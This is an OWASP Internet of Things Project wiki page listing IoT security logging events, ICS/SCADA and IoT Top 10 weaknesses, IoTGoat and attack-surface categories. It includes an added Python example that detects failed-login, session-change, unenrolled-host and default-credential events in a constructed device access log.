| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
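Most of the events in the table are derived, not logged directly: the device (or a collector in front of it) has to keep a little state over raw access logs and emit the event when a threshold is crossed. The following is an added example for this page, not OWASP project or AppSensor code. The log format is a constructed `key=value` line and the field names (`src`, `sid`, `method`, `path`, `user`, `result`, `cred`) are assumptions, not a real device's schema; the thresholds are likewise illustrative. It produces six of the table's events from a constructed eight-line log.<br />

```python
"""Derive the IoT logging events above from raw device access-log lines.
Added example (not OWASP project code). Log format, field names and
thresholds are assumptions; the sample log is constructed."""
from collections import defaultdict
from datetime import datetime, timezone

SUPPORTED_METHODS = {"GET", "POST"}
FAILED_PW_THRESHOLD = 3      # "Multiple Failed Passwords"
RATE_WINDOW_SECONDS = 60     # "High Rate of Login Attempts"
RATE_THRESHOLD = 5


def parse_line(line):
    """'2019-09-17T23:06:00Z src=... sid=... method=...' -> dict with a UTC 'ts'."""
    ts, *kv = line.split()
    rec = {"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)}
    for item in kv:
        k, _, v = item.partition("=")
        rec[k] = v
    return rec


def detect_events(lines, enrolled):
    """Return (category, event, detail) tuples in the order they were triggered."""
    events = []
    fails = defaultdict(int)         # user -> consecutive failed passwords
    attempts = defaultdict(list)     # src -> login timestamps inside the window
    session_src = {}                 # sid -> source address it was first seen from
    rate_flagged = set()
    for rec in map(parse_line, lines):
        src, sid = rec.get("src"), rec.get("sid")
        if src not in enrolled:
            events.append(("Ecosystem Membership Exceptions", "Traffic Seen from Unenrolled System", src))
        if rec.get("method") not in SUPPORTED_METHODS:
            events.append(("Request Exceptions", "Attempt to Invoke Unsupported HTTP Method", rec["method"]))
        if sid and session_src.setdefault(sid, src) != src:
            events.append(("Session Exceptions", "Source Location Changes During Session", sid))
        if rec.get("path") == "/login":
            t = rec["ts"]
            attempts[src] = [x for x in attempts[src] + [t] if (t - x).total_seconds() <= RATE_WINDOW_SECONDS]
            if len(attempts[src]) >= RATE_THRESHOLD and src not in rate_flagged:
                rate_flagged.add(src)
                events.append(("Authentication Exceptions", "High Rate of Login Attempts", src))
            user = rec.get("user")
            if rec.get("result") == "fail":
                fails[user] += 1
                if fails[user] == FAILED_PW_THRESHOLD:
                    events.append(("Authentication Exceptions", "Multiple Failed Passwords", user))
            elif rec.get("result") == "ok" and rec.get("cred") == "default":
                events.append(("Administrative Mode Events",
                               "Device Accessed Using Default Administrative Credentials", user))
    return events


# Constructed sample log: a brute-force that ends with the factory password,
# a session hijacked from another address, a TRACE probe and an unenrolled host.
SAMPLE_LOG = """\
2019-09-17T23:06:00Z src=10.0.0.5 sid=s1 method=POST path=/login user=admin result=fail
2019-09-17T23:06:05Z src=10.0.0.5 sid=s1 method=POST path=/login user=admin result=fail
2019-09-17T23:06:09Z src=10.0.0.5 sid=s1 method=POST path=/login user=admin result=fail
2019-09-17T23:06:12Z src=10.0.0.5 sid=s1 method=POST path=/login user=admin result=fail
2019-09-17T23:06:15Z src=10.0.0.5 sid=s1 method=POST path=/login user=admin result=ok cred=default
2019-09-17T23:07:00Z src=10.0.0.9 sid=s1 method=GET path=/admin/config
2019-09-17T23:07:30Z src=10.0.0.9 sid=s2 method=TRACE path=/
2019-09-17T23:08:00Z src=192.168.50.3 sid=s3 method=GET path=/status
""".splitlines()
ENROLLED = {"10.0.0.5", "10.0.0.9"}
```

The "default credentials" event is the one the device must decide for itself: only the firmware knows that the password which just succeeded is still the factory one, so it has to mark the record (here `cred=default`) at login time, which is exactly why the table asks devices to log it rather than leaving it to a collector.<br />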
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Security Logging Project? ==<br />
<br />
The IoT Security Logging Project provides a list of core events that should be logged in any IoT-related system. The project exists because IoT systems in general are not logging nearly enough events to serve as input to a solid detection and response program around IoT devices, and for companies that want to do this there are not many good resources on what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
=ICS/SCADA=<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
==ICS/SCADA Project==<br />
The OWASP ICS/SCADA Top 10 software weaknesses are as follows:<br />
{| class="wikitable" border="1" style="text-align: left"<br />
!Rank and ID<br />
!Title<br />
|-<br />
|'''1 - CWE-119'''<br />
|<br />
*Improper Restriction of Operations within the Bounds of a Memory Buffer<br />
|-<br />
|'''2 - CWE-20'''<br />
|<br />
*Improper Input Validation<br />
|-<br />
|'''3 - CWE-22'''<br />
|<br />
*Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')<br />
|-<br />
|'''4 - CWE-264'''<br />
|<br />
*Permissions, Privileges, and Access Controls<br />
|-<br />
|'''5 - CWE-200'''<br />
|<br />
*Information Exposure<br />
|-<br />
|'''6 - CWE-255'''<br />
|<br />
*Credentials Management Errors<br />
|-<br />
|'''7 - CWE-287'''<br />
|<br />
*Improper Authentication<br />
|-<br />
|'''8 - CWE-399'''<br />
|<br />
*Resource Management Errors<br />
|-<br />
|'''9 - CWE-79'''<br />
|<br />
*Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')<br />
|-<br />
|'''10 - CWE-189'''<br />
|<br />
*Numeric Errors<br />
|-<br />
|}{{Social Media Links}}<br />
| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |<br />
==What is the ICS/SCADA Project?==<br />
The ICS/SCADA Project provides:<br />
*A list of the Top 10 most dangerous software weaknesses<br />
==Project Leaders==<br />
*NJ Ouchn<br />
==Related Projects==<br />
*[[OWASP Mobile Security Project|OWASP Mobile Security]]<br />
*[[OWASP Top Ten Project|OWASP Web Top 10]]<br />
==Collaboration==<br />
[https://owasp-iot-security.slack.com/ The Slack Channel]<br />
==Quick Download==<br />
*Coming Soon<br />
==News and Events==<br />
*Coming Soon<br />
|}<br />
<br />
= IoTGoat =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoTGoat Project ==<br />
<br />
IoTGoat is a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities are based on the [[OWASP_Internet_of_Things_Project|OWASP IoT Top 10]].<br />
<br />
To get more information on getting started visit the project's Github: https://github.com/scriptingxss/IoTGoat<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoTGoat Project? ==<br />
<br />
The IoTGoat Project is a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the IoT Top 10.<br />
<br />
== GitHub ==<br />
https://github.com/scriptingxss/IoTGoat<br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
* Fotios Chantzis<br />
* [[User:Calderpwn|Paulino Calderon]]<br />
<br />
== Related Projects ==<br />
<br />
* WebGoat<br />
* Serverless Goat<br />
* NodeGoat<br />
* RailsGoat<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
[https://groups.google.com/forum/#!forum/iotgoat IoTGoat Google Group]<br />
<br />
== Quick Download ==<br />
* [https://docs.google.com/presentation/d/1SJfabCBxvC3GWnmBCqisO5pyLzkB1-EVcR7s8baT0dE/edit?usp=sharing Project Kick-off Slides]<br />
* [https://strozfriedberg.webex.com/recordingservice/sites/strozfriedberg/recording/playback/5529b228ac514bed8cc050a9dee0f0df Project Kick-off Meeting]<br />
* [https://docs.google.com/spreadsheets/d/1KXX2K7ikkve6wmdfAVu-sZONgKEBuAkRij_paJUgX2w/edit?usp=sharing Project Task List]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;"></div><br />
<br />
= Community =<br />
<br />
[https://www.iamthecavalry.org/ I Am The Cavalry] <br />
<br />
A global grassroots organization that is focused on issues where computer security intersects public safety and human life.<br />
<br />
Their areas of focus include:<br />
* Medical devices<br />
* Automobiles<br />
* Home Electronics<br />
* Public Infrastructure<br />
<br />
[https://otalliance.org Online Trust Alliance]<br />
<br />
Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501(c)(3) charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is a global organization supported by over 100 organizations, headquartered in Bellevue, Washington with offices in Washington DC.<br />
<br />
Addressing these mounting concerns, in January 2015 the Online Trust Alliance established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes that “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security and sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long-term supportability and transfers of ownership of devices and the data collected.<br />
<br />
[https://allseenalliance.org/framework AllSeen Alliance]<br />
<br />
The AllSeen Alliance is a Linux Foundation collaborative project. They're a cross-industry consortium dedicated to enabling the interoperability of billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write applications for interoperability regardless of transport layer, manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, including many other lightweight real-time operating systems.<br />
<br />
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]<br />
<br />
The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.<br />
<br />
[http://securingsmartcities.org/ Securing Smart Cities]<br />
<br />
Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.<br />
<br />
===Talks===<br />
<br />
RSA Conference San Francisco <br> <br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project] <br><br />
Daniel Miessler, Practice Principal <br><br />
April 21, 2015 <br><br />
--- <br><br />
Defcon 23 <br><br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping] <br><br />
Daniel Miessler <br><br />
August 6-9, 2015<br />
<br />
===Podcasts===<br />
<br />
* [http://iotpodcast.com/ The Internet of Things Podcast]<br />
* [http://www.iot-inc.com/ IoT Inc]<br />
* [https://craigsmith.net/iot-this-week/ IoT This Week]<br />
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]<br />
<br />
===IoT Conferences===<br />
<br />
* [http://www.iotevents.org Internet of Things Events]<br />
<br />
Conference Call for Papers<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]<br />
<br />
<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=254794OWASP Internet of Things Project2019-09-17T23:06:45Z<p>Aaron.guzman: </p>
<hr />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
== OWASP Internet of Things (IoT) Project ==<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects such as Attack Surface Areas, Testing Guides and Top Vulnerabilities.<br />
<br />
==Updated!==<br />
<br />
The OWASP IoT Project for 2018 has been released![[File:OWASP 2018 IoT Top10 Final.jpg|center|thumb|1301x1301px]]<br />
<br />
== Philosophy ==<br />
The OWASP Internet of Things Project was started in 2014 as a way to help Developers, Manufacturers, Enterprises, and Consumers make better decisions regarding the creation and use of IoT systems.<br />
<br />
This continues today with the 2018 release of the OWASP IoT Top 10, which represents the top ten things to avoid when building, deploying, or managing IoT systems. The primary theme for the 2018 OWASP Internet of Things Top 10 is simplicity. Rather than having separate lists for risks vs. threats vs. vulnerabilities—or for developers vs. enterprises vs. consumers—the project team elected to have a single, unified list that captures the top things to avoid when dealing with IoT Security.<br />
<br />
The team recognized that there are now dozens of organizations releasing elaborate guidance on IoT Security—all of which are designed for slightly different audiences and industry verticals. We thought the most useful resource we could create is a single list that addresses the highest priority issues for manufacturers, enterprises, and consumers at the same time.<br />
<br />
The result is the [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf 2018 OWASP IoT Top 10].<br />
<br />
== Methodology ==<br />
The project team is a collection of volunteer professionals from within the security industry, with experience spanning multiple areas of expertise, including: manufacturers, consulting, security testers, developers, and many more.<br />
<br />
The project was conducted in the following phases:<br />
# '''Team Formation''': finding people who would be willing to contribute to the 2018 update, both as SMEs and as project leaders to perform various tasks within the duration of the project.<br />
# '''Project Review:''' analysis of the 2014 project to determine what’s changed in the industry since that release, and how the list should be updated given those changes.<br />
# '''Data Collection''': collection and review of multiple vulnerability sources (both public and private), with special emphasis on which issues caused the most actual impact and damage.<br />
# '''Sister Project Review''': a review of dozens of other IoT Security projects to ensure that we’d not missed something major and that we were comfortable with both the content and prioritization of our release. Examples included: [https://cloudsecurityalliance.org/artifacts/csa-iot-controls-matrix/ CSA IoT Controls Matrix], [https://api.ctia.org/wp-content/uploads/2018/08/CTIA-IoT-Cybersecurity-Certification-Test-Plan-V1_0.pdf CTIA], [http://iot.stanford.edu/ Stanford’s Secure Internet of Things Project], [https://nvlpubs.nist.gov/nistpubs/ir/2018/NIST.IR.8200.pdf NISTIR 8200], [https://www.enisa.europa.eu/publications/baseline-security-recommendations-for-iot/at_download/fullReport ENISA IoT Baseline Report], [https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/747413/Code_of_Practice_for_Consumer_IoT_Security_October_2018.pdf Code of Practice for Consumer IoT Security,] and others.<br />
# '''Community Draft Feedback''': release of the draft to the community for review, including multiple Twitter calls for comments, the use of a public feedback form, and a number of public talks where feedback was gathered. The feedback was then reviewed by the team along with initial Data Collection, as well as Sister Project Review, to create the list contents and prioritization.<br />
# '''Release:''' release of the project to the public in December 2018.<br />
<br />
== The Future of the OWASP IoT Top 10 ==<br />
The team has a number of activities planned to continue improving on the project going forward.<br />
<br />
Some of the items being discussed include:<br />
* Continuing to improve the list on a two-year cadence, incorporating feedback from the community and from additional project contributors to ensure we are staying current with issues facing the industry.<br />
* Mapping the list items to other OWASP projects, such as the ASVS, and perhaps to other projects outside OWASP as well.<br />
* Expanding the project into other aspects of IoT, including embedded security, ICS/SCADA, etc.<br />
* Adding use and abuse cases, with multiple examples, to solidify each concept discussed.<br />
* Considering the addition of reference architectures, so we can not only tell people what to avoid, but how to do what they need to do securely.<br />
<br />
Participation in the OWASP IoT Project is open to the community. We take input from all participants — whether you’re a developer, a manufacturer, a penetration tester, or someone just trying to implement IoT securely. You can find the team meeting every other Friday in the #iot-security room of the OWASP Slack Channel.<br />
<br />
'''''The OWASP IoT Security Team, 2018'''''<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the [http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, adapt it, and use it commercially, provided that you attribute the work and that, if you alter, transform, or build upon this work, you distribute the resulting work only under the same or a similar license.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
* IoTGoat<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
* Vishruta Rudresh<br />
* Aaron Guzman<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== IoT Top 2018 Contributors ==<br />
* Vijayamurugan Pushpanathan <br />
* Alexander Lafrenz <br />
* Masahiro Murashima <br />
* Charlie Worrell <br />
* José A. Rivas (jarv) <br />
* Pablo Endres <br />
* Ade Yoseman <br />
* Cédric Levy-Bencheton<br />
* Jason Andress<br />
* Amélie Didion - Designer<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's Slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top Ten 2018]<br />
<br />
[https://www.owasp.org/images/7/7b/IoT_Preso_v1.pptx Quick discussion on IoT]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten 2014 PDF]<br />
<br />
[https://www.owasp.org/images/8/8e/Infographic-v1.jpg OWASP IoT Top Ten 2014 Infographic]<br />
<br />
[https://www.owasp.org/images/0/01/Internet_of_Things_Top_Ten_2014-OWASP-ppt.pptx OWASP IoT Top Ten 2014 PPT]<br />
<br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf OWASP IoT Top Ten-RSA 2015]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* OWASP [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoTGoat IoTGoat Project] underway<br />
* IoT ASVS and Testing Guide set to kick off in 2019<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project: [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= IoT Top 10 =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top 10 - 2018] is now available.<br />
* I1 Weak, Guessable, or Hardcoded Passwords<br />
* I2 Insecure Network Services<br />
* I3 Insecure Ecosystem Interfaces<br />
* I4 Lack of Secure Update Mechanism<br />
* I5 Use of Insecure or Outdated Components<br />
* I6 Insufficient Privacy Protection<br />
* I7 Insecure Data Transfer and Storage<br />
* I8 Lack of Device Management<br />
* I9 Insecure Default Settings<br />
* I10 Lack of Physical Hardening<br />
<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
= OWASP IoT Top 10 2018 Mapping Project =<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Top 10 2018 Mapping Project ==<br />
<br />
The OWASP IoT Mapping Project is intended to provide a mapping of the OWASP IoT Top 10 2018 to industry publications and sister projects. The goal is to provide resources that enable practical uses of the OWASP IoT Top 10. Like all Top 10 lists, it should be used as a first step and expanded upon according to the applicable IoT ecosystem.<br />
<br />
Mappings are structured with control categories, tests, or recommendations in the left column, descriptions in the middle column, and their mapping to the OWASP IoT Top 10 2018 list in the right column. Not every mapping is one-to-one; where no exact match exists, similar recommendations and/or controls are listed. For mappings that are not applicable to the IoT Top 10 2018 list, "N/A" is provided as the mapping.<br />
<br />
An example mapping of the IoT Top 10 2014 is provided below. <br />
<br />
[[File:2014 2018Mapping.png|center|frameless|746x746px]]<br />
<br />
For additional mappings, please visit the following link: https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Top 10 Mapping Project? ==<br />
<br />
The OWASP IoT Mapping Project is intended to provide a mapping of the OWASP IoT Top 10 2018 to industry publications and sister projects. The goal is to provide resources that enable practical uses of the OWASP IoT Top 10. Like all Top 10 lists, it should be used as a first step and expanded upon according to the applicable IoT ecosystem.<br />
<br />
Mappings include the following:<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/owasp-iot-top-10-2014 OWASP IoT Top 10 2014]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/gsma-iot-security-assessment-checklist GSMA IoT Security Assessment Checklist]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/code-of-practice Code of Practice (UK Government)]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/enisa-baseline-security-recommendations-for-iot ENISA Baseline Security Recommendations for IoT]<br />
<br />
and more...<br />
<br />
== GitBook ==<br />
Mappings are hosted on GitBook at the following link: https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/<br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
|}<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
